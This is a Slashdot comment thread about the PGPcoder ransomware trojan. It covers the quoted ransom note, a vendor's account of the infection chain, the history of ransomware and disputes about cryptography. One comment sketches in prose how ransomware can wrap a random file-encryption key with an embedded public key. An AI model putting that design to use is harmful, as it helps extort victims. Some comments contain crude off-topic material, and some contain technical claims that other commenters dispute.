Virus Hold Computer Files 'Hostage' for $200

dwayner79 sent in a story about a new virus making the rounds- this one is unique because it locks your files and then demands a $200 ransom to get them back. It seems to me that this might leave some sort of tracable money trail. They don't have much information on any particular transmission mechanism, they just talk about web pages giving it up.

Must be a real moron

[Kosi]

because his "blackmail-letter" is a file called attention!!!.txt, containing this:

Some files are coded.
To buy decoder mail: n781567@yahoo.com
with subject: PGPcoder 000000000032

Not Possible

[Billy the Impaler]

There's no way for a programmer to collect a ransom for files. How's he going to collect the money, a paypal account? Please! The feds will be all over this guy in a matter of minutes.

Re:a fix

[keshto]

Because if the hacker has encrypted the files with a random passphrase and assuming this passphrase isn't the same for all the computers he attacks, it is highly unlikely a security company will be able to easily decrypt the files.

That is what is particularly scary about this. What if the hacker went offline-- even if you are willing to pay the money, you can't get to the files. They are as good as deleted

Re:I call hoax

[hedleyroos]

You are an idiot for dismissing South Africa as third world. We may be in Africa and suffer from some of its problems, but I am sitting here typing my message from a Gentoo box while installing FreeBSD on another machine. Third world? I think not. Also, the sun rises earlier in South Africa than in the US. We sometimes get news earlier than you do because New Zealand and Australia wake up looong before you do.

"Malicious Cryptography: Exposing Cryptovirology"

[scovetta]

I just finished reading "Malicious Cryptography: Exposing Cryptovirology", and it talks greatly about exactly this. The problem is that, due to wonderful things like public-key encryption, evildoers could conduct an attack like this without leaving a trace.

I'd highly recommend the book (no, I don't know that author).

Re:It won't get a penny from me...

[HadenT]

Why not:
generate random key, encrypt data with it (symmetric),
encrypt that key with public one (stored in virus itself), destroy random key, give victim encrypted key.
Victim sends encrypted key to author, he decrypts it using his private key and sends it back.

Re:Finally!

[sosume]

I too was innocent on the subject of lemon party.

I expected some funky game involving lemon juice and pie ..

Now I know as well.

This is even more gross than goatse, parrot or tubgirl! As a matter in fact I'm taking the rest of the day off, avoiding elderly people, to make sure my mind can recover.

Fellow /.ers, please take my advise and do NOT google for it.

I won't be able to get the image I just googled out of my memory next time someone mentions a lemon .. even though I don't really understand the 'lemon' part

Re:I call hoax

[t123]

try the websense website with more detailed information [websensesecuritylabs.com].

The original infection occurs when the user visits a malicious website that exploits a previous vulnerability in Microsoft Internet Explorer. This vulnerability allows applications to run without user intervention. The malicious website uses the Windows help subsystem and a CHM file to download and run a Trojan Horse (download-aag). The downloader then connects, via HTTP, to another malicious website. This website hosts the application that encodes files on the user's local hard disk and on any mapped drives on the machine. The malicious code also drops a message onto the system with instructions on how to buy the tool needed to decode the files. This message includes the email address of a third party to contact for instructions, and the user is directed to deposit money into an online E-Gold account.

Re:Finally!

[Pastis]

You can learn about lemonparty here, but browse without images...

http://www.encyclopediadramatica.com/index.php/Lem onparty [encycloped...matica.com]

Re:This could be good

[R.Mo_Robert]

Do you really think a virus is going to take spyware hostage and then demand $200 for the key to unencrypt it? I don't know about you, but even if it did, I sure wouldn't be happy with this kind of virus on my computer.

Plus the article mentions this paritcular infection affected only "at least fifteen types of data," most of which were presumably important to the user, like spreadsheets and the like. But again, even if it did encrypt malware ... I don't see how it could be a good thing. Let's introduce them to Ad-Aware, Spybot, etc. instead, and safe browsing habits--the lack of which probably allowed both this virus and the malware on the computer in the first place.

The AIDS Trojan already tried this trick

[Mattias]

The encrypt-files-and-demand-ransom-trick has been tried before by criminals in 1989. A company sent out disks with software containing a trojan that encrypted the harddisk and then demanded money to decrypt it.

http://www.claws-and-paws.com/virus/papers/history -of-computer-viruses.html#C05 [claws-and-paws.com]

Re:Must be a real moron

[caluml]

Actually, the best **almost** anonymous way of sending messages is to PGP/GPG encrypt them, and post them to alt.anonymous.messages [google.com]. Then, the right person, with the correct key can download your message, and (if he downloads every message in the group every day), you'd never know which ones he was able to read. And obviously others wouldn't be able to read the contents.

Re:I call hoax

[XMyth]

http://securityresponse.symantec.com/avcenter/venc /data/trojan.pgpcoder.html [symantec.com]

Re:Finally!

[Dusabre]

WATCH OUT!

There is a thumbnail!

Re:a fix

[budgenator]

according to TFA

Stewart managed to unlock the infected computer files without paying the extortion, but he worries that improved versions might be more difficult to overcome.

so it's already been either bruteforced or cracked. My hunch is that a encryption program carried in a virus would be rather simplistic.

Re:a fix

[httptech]

It's not a command in the trojan that decrypts the files, it's a program the trojan author sends you after you send him $200. However, the encryption is trivial and just about any reverse-engineer could write a decryptor for you.

-Joe

Joe Stewart, GCIH
Senior Security Researcher
LURHQ http://www.lurhq.com/ [lurhq.com]

Re:Wow

[httptech]

Yes, funny funny. In context, though, you have to know the question the reporter asked me, which was, "Do you think this software was a test, or do you think it was malicious?"

-Joe

--
Joe Stewart, GCIH
Senior Security Researcher
LURHQ http://www.lurhq.com/ [lurhq.com]

Re:Crypto Question

[swillden]

If you have just two files its still extremely hard... you need something like 2^23 files to do it in a reasonable amount of time (assuming RSA+IDEA).

This post is incorrect. Probably a semi-subtle troll rather than an honest error.

Neither RSA nor IDEA is vulnerable to a known-plaintext attack. In fact, any cipher that is vulnerable to such an attack is considered completely insecure, especially if only 2^23 "files" are needed.

If you get to choose the contents of one of the files its only about 2^17.

Neither RSA nor IDEA is vulnerable to a chosen-plaintext attack. There were some chosen-plaintext attacks against RSA a few years back (mid 90s), but proper padding eliminates them. And far more than 2^17 trials were required for typical key sizes. Again, no cipher that was vulnerable to such an attack would be considered secure.

Obviosly, if the keys are larger, it will take exponentially longer.

Larger than what? Are you assuming extremely small key sizes in order to achieve the numbers above? Actually, you don't get to pick the size of an IDEA key, because IDEA keys are 128 bits. Though you can arbitrarily fix key bits to produce a smaller effective key, there's no reason why the virus writer would want to do that.

Re:reminds me of the 'jackpot' virus

[RIAA Bounty Hunter]

That virus was known as Casino.2330 [nai.com].

Screenshots [virusexperts.com]

Re:An old remake, using the Net this time, and $$$

[Leebert]

You're probably referring to the "One-Half" virus, if I recall correctly from my days reading alt.comp.virus.

This was the classic example as to why blindly running "fdisk /mbr" from a boot floppy was a no-no.

Re:It won't get a penny from me...

[icypyr0]

Too bad an FBI investigation/ prosecution costs over $200,000 on average. That's 1000x the $200 ransom. Bottom line; it would have to be a widespred thing for the FBI to give a shit.

Re:This makes me wonder...

[AstroDrabb]

You can protect individual user directories in Windows XP if you set up permissions correctly, just the same as how you can protect individual user directories on Linux if you set up permissions correctly.

Yes, you can set up XP permissions correctly. Well, XP home kills your ability to do this easily. Read this article [winsupersite.com]. XP Home is pretty much brain dead IMO. From the article about Home vs Pro:

The most obvious difference is security, which is vastly simplified in Home Edition. Each interactive user in XP Home is assumed to be a member of the Owners local group, which is the Windows XP equivalent of the Windows 2000 Administrator account

So the majority of all computer users using MS Windows XP are running as admin. They are open to far more problems than the typical Linux or Mac OS X user who are running as a non-admin user. Sure you can run as root/admin under the other OS'es, however it is not the norm.

I would argue that there are quite a few new Linux users who foolishly make liberal use of the root account to make certain tasks easier. While maybe a competent Linux user would not make such mistakes, theres no reason to expect that a competent user would make the same kinds of mistakes on a Windows machine.

And your argument would be wrong. All of the major Linux distro's have users create a non-root account at _install time_. When it comes time to do a task that requires root, a nice little GUI window pops up and asks for the root password (oh, this also happens from the console/command line).

it's not helpful when Linux extremists like you warp the truth to fit your agenda.

Linux extremists like me? So I say something negative about MS and now I am a "Linux extremists"? Stop being an MS appologist. I make my living by writting software on MS OSes. I just don't appoligize for all the stupid things MS do.

You should be ashamed.

Ashamed of what? Not making up excuses for every brain dead thing that MS has done. You should be the one that is ashamed for sweeping the problems of MS under the rug.